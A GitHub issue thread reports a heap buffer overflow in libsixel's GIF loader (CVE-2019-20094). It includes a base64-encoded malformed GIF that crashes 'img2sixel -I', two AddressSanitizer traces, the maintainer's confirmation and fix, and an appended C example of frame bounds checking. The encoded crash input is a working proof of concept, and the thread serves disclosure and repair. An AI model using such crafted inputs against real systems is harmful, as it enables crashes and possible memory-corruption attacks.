saitoha / libsixel

A SIXEL encoder/decoder implementation derived from kmiya's sixel (https://github.com/saitoha/sixel).
MIT License

heap overflow in fromgif.c:250 #125

Closed cuanduo closed 4 years ago

cuanduo commented 4 years ago

img2sixel -I $POC

smile.zip

asan output

root@ubuntu:/home/tim/libsixel/converters# ../../libsixel-asan/converters/img2sixel -I overflows/smile.gif-out_of_bound-idx\:0xa34-0x0 
=================================================================
==57335==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7f84cfa29e9c at pc 0x55fd2c49e55d bp 0x7ffe53350470 sp 0x7ffe53350460
WRITE of size 1 at 0x7f84cfa29e9c thread T0
    #0 0x55fd2c49e55c in gif_init_frame /home/tim/libsixel-asan/src/fromgif.c:250
    #1 0x55fd2c4a0cba in load_gif /home/tim/libsixel-asan/src/fromgif.c:644
    #2 0x55fd2c49a9d0 in load_with_builtin /home/tim/libsixel-asan/src/loader.c:888
    #3 0x55fd2c49b3a5 in sixel_helper_load_image_file /home/tim/libsixel-asan/src/loader.c:1392
    #4 0x55fd2c44bd0c in sixel_encoder_encode /home/tim/libsixel-asan/src/encoder.c:1737
    #5 0x55fd2c441e3b in main /home/tim/libsixel-asan/converters/img2sixel.c:457
    #6 0x7f852961bb6a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x26b6a)
    #7 0x55fd2c43f7a9 in _start (/home/tim/libsixel-asan/converters/img2sixel+0x397a9)

0x7f84cfa29e9c is located 0 bytes to the right of 58156700-byte region [0x7f84cc2b3800,0x7f84cfa29e9c)
allocated by thread T0 here:
    #0 0x7f8529af4448 in malloc (/lib/x86_64-linux-gnu/libasan.so.5+0x10c448)
    #1 0x55fd2c44204a in rpl_malloc /home/tim/libsixel-asan/converters/malloc_stub.c:45
    #2 0x55fd2c44c995 in sixel_allocator_malloc /home/tim/libsixel-asan/src/allocator.c:155
    #3 0x55fd2c49e1c5 in gif_init_frame /home/tim/libsixel-asan/src/fromgif.c:239
    #4 0x55fd2c4a0cba in load_gif /home/tim/libsixel-asan/src/fromgif.c:644
    #5 0x55fd2c49a9d0 in load_with_builtin /home/tim/libsixel-asan/src/loader.c:888
    #6 0x55fd2c49b3a5 in sixel_helper_load_image_file /home/tim/libsixel-asan/src/loader.c:1392
    #7 0x55fd2c44bd0c in sixel_encoder_encode /home/tim/libsixel-asan/src/encoder.c:1737
    #8 0x55fd2c441e3b in main /home/tim/libsixel-asan/converters/img2sixel.c:457
    #9 0x7f852961bb6a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x26b6a)

SUMMARY: AddressSanitizer: heap-buffer-overflow /home/tim/libsixel-asan/src/fromgif.c:250 in gif_init_frame
Shadow bytes around the buggy address:
  0x0ff119f3d380: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0ff119f3d390: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0ff119f3d3a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0ff119f3d3b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0ff119f3d3c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0ff119f3d3d0: 00 00 00[04]fa fa fa fa fa fa fa fa fa fa fa fa
  0x0ff119f3d3e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0ff119f3d3f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0ff119f3d400: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0ff119f3d410: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0ff119f3d420: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
  Shadow gap:              cc
==57335==ABORTING
root@ubuntu:/home/tim/libsixel/converters# 
saitoha commented 4 years ago

I can't reproduce it.

$ Linux vagrant 4.15.0-72-generic #81-Ubuntu SMP Tue Nov 26 12:20:02 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
$ git checkout v1.8.4 && (CFLAGS="-g -O0 -fno-omit-frame-pointer -fsanitize=address" ./configure && make && sudo make install) 2>&1 > /dev/null && echo H4sIAM5HA14AA3P3dLOwTIzafqjiIjMDENzlZP/9mfX///+KP1l4uRiYGXRAogZAyMD0786OwsfHeqXN88hlBC5y6ZTCJjVFAyQlpJqFIeUFk/K6gialipCasgJFSghZSiMQSaoTTeoRXMoNXWoRXAokwtSi8Q8iB2QFLjoClVsMFGFlYoFogzKQpBiZWDjAUlAGVGoRFqlOQlKBWKWk8EtZYJcSgkuhOx5JCuJTOOMfihxqUEGkNHBImcKkWBFSIsRLMeKUYlJEkuJAkWJQRZYKQEg5NDAg6ZrCIaDgAJaywLALNaT+CbE6weUwgwomxdWCPxQhUjugiuHRAtGOiEygFRJAlzUwMDshSRVCXTYDJMXBDHWrNJLUlA6DxEMtnIooUouhkSEAlIKFSy+qVCDQQCFUqccocfkPzDpCRG7Bk8fw5Ux8+RlfKYCv7MBX4pDGkMYtx8pgDQAZg3/ARQUAAA== | base64 --decode | gunzip | converters/img2sixel && echo ok
HEAD is now at 686d234 Merge branch 'release'
ar: `u' modifier ignored since `D' is the default (see `U')
q"1;1;48;48#0;2;0;0;0#1;2;87;4;3#2;2;98;95;2-------ok

Can you give me more information about your environment?

saitoha commented 4 years ago

ok, reproduced with -I option

$ git checkout v1.8.4 && (CFLAGS="-g -O0 -fno-omit-frame-pointer -fsanitize=address" ./configure && make && sudo make install) 2>&1 > /dev/null && echo H4sIAM5HA14AA3P3dLOwTIzafqjiIjMDENzlZP/9mfX///+KP1l4uRiYGXRAogZAyMD0786OwsfHeqXN88hlBC5y6ZTCJjVFAyQlpJqFIeUFk/K6gialipCasgJFSghZSiMQSaoTTeoRXMoNXWoRXAokwtSi8Q8iB2QFLjoClVsMFGFlYoFogzKQpBiZWDjAUlAGVGoRFqlOQlKBWKWk8EtZYJcSgkuhOx5JCuJTOOMfihxqUEGkNHBImcKkWBFSIsRLMeKUYlJEkuJAkWJQRZYKQEg5NDAg6ZrCIaDgAJaywLALNaT+CbE6weUwgwomxdWCPxQhUjugiuHRAtGOiEygFRJAlzUwMDshSRVCXTYDJMXBDHWrNJLUlA6DxEMtnIooUouhkSEAlIKFSy+qVCDQQCFUqccocfkPzDpCRG7Bk8fw5Ux8+RlfKYCv7MBX4pDGkMYtx8pgDQAZg3/ARQUAAA== | base64 --decode | gunzip | converters/img2sixel -I && echo ok
HEAD is now at 686d234 Merge branch 'release'
ar: `u' modifier ignored since `D' is the default (see `U')
=================================================================
==3386==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7f2bf4629e9c at pc 0x7f2c542785f4 bp 0x7ffe807e8570 sp 0x7ffe807e8560
WRITE of size 1 at 0x7f2bf4629e9c thread T0
    #0 0x7f2c542785f3 in gif_init_frame /home/vagrant/libsixel/src/fromgif.c:250
    #1 0x7f2c5427ad7d in load_gif /home/vagrant/libsixel/src/fromgif.c:644
    #2 0x7f2c54274a9c in load_with_builtin /home/vagrant/libsixel/src/loader.c:888
    #3 0x7f2c54275426 in sixel_helper_load_image_file /home/vagrant/libsixel/src/loader.c:1392
    #4 0x7f2c54284d5d in sixel_encoder_encode /home/vagrant/libsixel/src/encoder.c:1737
    #5 0x55cce5eb4232 in main /home/vagrant/libsixel/converters/img2sixel.c:451
    #6 0x7f2c53e12b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96)
    #7 0x55cce5eb1c59 in _start (/home/vagrant/libsixel/converters/.libs/img2sixel+0x1c59)

0x7f2bf4629e9c is located 0 bytes to the right of 58156700-byte region [0x7f2bf0eb3800,0x7f2bf4629e9c)
allocated by thread T0 here:
    #0 0x7f2c545bbb50 in __interceptor_malloc (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xdeb50)
    #1 0x55cce5eb4523 in rpl_malloc /home/vagrant/libsixel/converters/malloc_stub.c:45
    #2 0x7f2c542924b0 in sixel_allocator_malloc /home/vagrant/libsixel/src/allocator.c:155
    #3 0x7f2c5427825c in gif_init_frame /home/vagrant/libsixel/src/fromgif.c:239
    #4 0x7f2c5427ad7d in load_gif /home/vagrant/libsixel/src/fromgif.c:644
    #5 0x7f2c54274a9c in load_with_builtin /home/vagrant/libsixel/src/loader.c:888
    #6 0x7f2c54275426 in sixel_helper_load_image_file /home/vagrant/libsixel/src/loader.c:1392
    #7 0x7f2c54284d5d in sixel_encoder_encode /home/vagrant/libsixel/src/encoder.c:1737
    #8 0x55cce5eb4232 in main /home/vagrant/libsixel/converters/img2sixel.c:451
    #9 0x7f2c53e12b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96)

SUMMARY: AddressSanitizer: heap-buffer-overflow /home/vagrant/libsixel/src/fromgif.c:250 in gif_init_frame
Shadow bytes around the buggy address:
  0x0fe5fe8bd380: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0fe5fe8bd390: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0fe5fe8bd3a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0fe5fe8bd3b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0fe5fe8bd3c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0fe5fe8bd3d0: 00 00 00[04]fa fa fa fa fa fa fa fa fa fa fa fa
  0x0fe5fe8bd3e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0fe5fe8bd3f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0fe5fe8bd400: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0fe5fe8bd410: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0fe5fe8bd420: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==3386==ABORTING
carnil commented 4 years ago

This issue has been assigned CVE-2019-20094.

saitoha commented 4 years ago

Fixed on v1.8.5. Thanks!
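The thread never states what gif_init_frame does wrong at fromgif.c:250; the two ASan reports only show a 1-byte write landing 0 bytes past the end of a buffer that the same function allocated at line 239, and that the bug needs the -I path. The block below is an added example and is not libsixel's code: it shows the check a GIF frame initializer needs before it fills a canvas, namely that the image descriptor rectangle (left, top, width, height) fits inside the logical screen, and how an unchecked rectangle that runs past the canvas by whole rows produces exactly that "0 bytes to the right" signature. Everything in it is assumed for illustration: the minimal GIF layout it parses (header, logical screen descriptor, then an image descriptor with no global colour table and no extension blocks in between), the GIF_MAX_PIXELS cap, the function names, and the two constructed sample files (they are not the issue's smile.gif).

```c
/* gif_frame_check.c: validate a GIF image descriptor against the logical
 * screen before touching the frame buffer.  Added illustration of the
 * check; not libsixel code and not a claim about its actual bug. */
#include <limits.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define GIF_MAX_PIXELS (64u * 1024u * 1024u)  /* assumed policy cap: 64 Mpixel */

typedef struct {
    unsigned w, h;          /* logical screen size from the header */
    unsigned x, y, fw, fh;  /* image descriptor: left, top, width, height */
} gif_geom_t;

static unsigned rd16(const unsigned char *p) { return (unsigned)p[0] | ((unsigned)p[1] << 8); }

/* Parse "GIF8?a" + logical screen descriptor (13 bytes) and the first image
 * descriptor (10 bytes).  Assumes no global colour table and no extension
 * blocks, so the 0x2C image separator sits at offset 13. */
int gif_parse_geom(const unsigned char *buf, size_t len, gif_geom_t *g)
{
    if (len < 13 + 10) return -1;
    if (memcmp(buf, "GIF87a", 6) != 0 && memcmp(buf, "GIF89a", 6) != 0) return -1;
    g->w = rd16(buf + 6);
    g->h = rd16(buf + 8);
    if (buf[10] & 0x80) return -1;   /* global colour table flag: unsupported here */
    if (buf[13] != 0x2C) return -1;  /* expect the image separator */
    g->x  = rd16(buf + 14);
    g->y  = rd16(buf + 16);
    g->fw = rd16(buf + 18);
    g->fh = rd16(buf + 20);
    return 0;
}

/* Reject frames that do not fit in the canvas.  The fields are 16-bit so the
 * sums cannot overflow an unsigned int, but the comparisons are written as
 * subtractions so they stay correct if the fields were ever widened. */
int gif_frame_fits(const gif_geom_t *g)
{
    if (g->w == 0 || g->h == 0 || g->fw == 0 || g->fh == 0) return 0;
    if ((unsigned long long)g->w * g->h > GIF_MAX_PIXELS) return 0;
    if (g->fw > g->w || g->x > g->w - g->fw) return 0;  /* x + fw <= w */
    if (g->fh > g->h || g->y > g->h - g->fh) return 0;  /* y + fh <= h */
    return 1;
}

/* Allocate the w*h one-byte-per-pixel canvas, clear it to `bg`, and paint the
 * frame rectangle with `color`.  Refuses to allocate unless the frame fits,
 * so every index written is below w*h. */
unsigned char *gif_init_canvas(const gif_geom_t *g, unsigned char bg, unsigned char color)
{
    size_t n = (size_t)g->w * g->h;
    unsigned char *out;
    if (!gif_frame_fits(g)) return NULL;
    out = malloc(n);
    if (out == NULL) return NULL;
    memset(out, bg, n);
    for (unsigned row = 0; row < g->fh; ++row)
        memset(out + (size_t)(g->y + row) * g->w + g->x, color, g->fw);
    return out;
}

/* Index of the last byte the fill loop above would touch if the bounds check
 * were skipped.  >= w*h means the unchecked loop writes past the allocation. */
size_t gif_last_fill_index(const gif_geom_t *g)
{
    return (size_t)(g->y + g->fh - 1) * g->w + g->x + g->fw - 1;
}

/* Offset of the first pixel of the first frame row that starts at or past the
 * end of the canvas, or SIZE_MAX if every row starts inside it.  For a frame
 * that overruns by whole rows this is exactly w*h: ASan would report it as
 * "0 bytes to the right" of the region. */
size_t gif_first_row_overrun(const gif_geom_t *g)
{
    size_t n = (size_t)g->w * g->h;
    for (unsigned row = 0; row < g->fh; ++row) {
        size_t start = (size_t)(g->y + row) * g->w + g->x;
        if (start >= n) return start;
    }
    return SIZE_MAX;
}

/* Constructed samples (not the issue's smile.gif): a 4x3 canvas with an
 * in-bounds 2x2 frame at (1,1), and the same canvas with a 4x3 frame at
 * (0,1) whose last row starts at byte 12 = w*h. */
const unsigned char GOOD[] = {
    'G','I','F','8','9','a', 4,0, 3,0, 0x00, 0, 0,
    0x2C, 1,0, 1,0, 2,0, 2,0, 0x00 };
const unsigned char BAD[] = {
    'G','I','F','8','9','a', 4,0, 3,0, 0x00, 0, 0,
    0x2C, 0,0, 1,0, 4,0, 3,0, 0x00 };

int main(void)
{
    const unsigned char *samples[2] = { GOOD, BAD };
    for (int i = 0; i < 2; ++i) {
        gif_geom_t g;
        if (gif_parse_geom(samples[i], sizeof GOOD, &g) != 0) { puts("parse error"); continue; }
        printf("frame %ux%u at (%u,%u) on %ux%u canvas: %s\n", g.fw, g.fh, g.x, g.y,
               g.w, g.h, gif_frame_fits(&g) ? "ok" : "rejected");
        free(gif_init_canvas(&g, 0, 1));
    }
    return 0;
}
```

The point of keeping the check in gif_frame_fits() rather than inside the fill loop is that every later consumer of the frame (interlace handling, palette application, the high-colour path that -I selects) inherits the guarantee that x + fw <= w and y + fh <= h, so no loop has to re-derive its own bound from untrusted descriptor fields.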